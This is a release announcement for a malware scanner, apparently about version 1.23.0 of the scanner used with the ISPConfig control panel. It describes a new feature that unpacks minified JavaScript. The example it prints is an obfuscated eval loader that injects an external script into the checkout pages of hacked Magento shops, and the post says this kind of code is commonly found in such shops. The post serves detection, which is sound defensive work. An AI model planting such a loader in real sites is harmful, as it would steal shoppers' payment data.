Today we released version 1.23.0 of our malware scanning tool. With this release we added a feature to "unpack" some JavaScripts that were minified. For example:
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1.4=5(){6((2 7(\'8|9|a\')).b(1.c)){$$(\'d\')[0].e(2 f(\'g\',{h:\'i/j\',k:\'l://m.n.o/p/3/q/r.3\'}))}}',28,28,'|window|new|js|onload|function|if|RegExp|onepage|checkout|onestep|test|location|head|appendChild|Element|script|type|text|javascript|src|https|boutique|postedecoute|ca|media|shipping|ups'.split('|'),0,{}));
will be unpacked to
window.onload=function(){if((new RegExp('onepage|checkout|onestep')).test(window.location)){$$('head')[0].appendChild(new Element('script',{type:'text/javascript',src:'https://boutique.postedecoute.ca/media/js/shipping/ups.js'}))}}
and such correctly recognized as malware commonly used in hacked magento shop installations.
In addition we added further malware strings to be recognized in the database content scan.
Marius Burkard has been working as a software developer for 20 years and has several years of experience as a server administrator. As one of the lead developers of the ISPConfig control panel and technical contact for several hundred web hosting customers, he has extensive experience with malware, hacked websites and the analysis of vulnerabilities.